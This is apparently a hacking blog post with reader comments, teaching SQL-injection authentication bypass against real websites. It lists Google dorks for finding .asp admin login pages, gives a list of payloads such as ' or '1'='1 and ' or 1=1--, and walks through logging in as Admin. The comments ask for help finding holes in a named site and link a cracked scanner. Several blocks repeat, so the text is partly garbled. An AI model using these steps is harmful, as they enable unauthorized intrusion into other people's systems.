Part 1 : Basic sql injection
Note:- All Tutorial is for educational Purpose only. Please Domt Miss use of it.
Gaining auth bypass on an admin account. Most sites vulnerable to this are .asp. First we need 2 find a site, start by opening google.
' or 'x'='x
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site. The site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin" and for our password we type our sql injection here is a list of sql injections.
' or '1'='1
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site. The site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin" and for our password we type our sql injection here is a list of sql injections.
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
There are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
There are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.
So your input should look like this
Username: Admin
password: 'or'1'='1
So click submit and you'r in
NOTE not all sites are vulnerable.
Username: Admin
password: 'or'1'='1
NOTE not all sites are vulnerable.
Note:- All Tutorial is for educational Purpose only. Please Domt Miss use of it.
Comment If you like the tutorials. [Video Tutorials Comming soon]
3 comments:
Plz Find Vulnerability Of This Website...i m unable to find it...
http://bietjunagadh.org
dj Alone bro.. try web scanner to find the vulnerability on the site.. like.. web crusier, acunetix, web scanner. you can download acunetix full version from here http://redeyehack.blogspot.in/2012/07/acunetix-7-full-version-free-download.html?m=0
Hello sir
can u explain what is ip address
and how work it
Post a Comment
This is Dofollow Blog.
Don't Spam us. Your comment should be relevant to contents(don't say simply thanks or very useful information, i'll consider this as spam).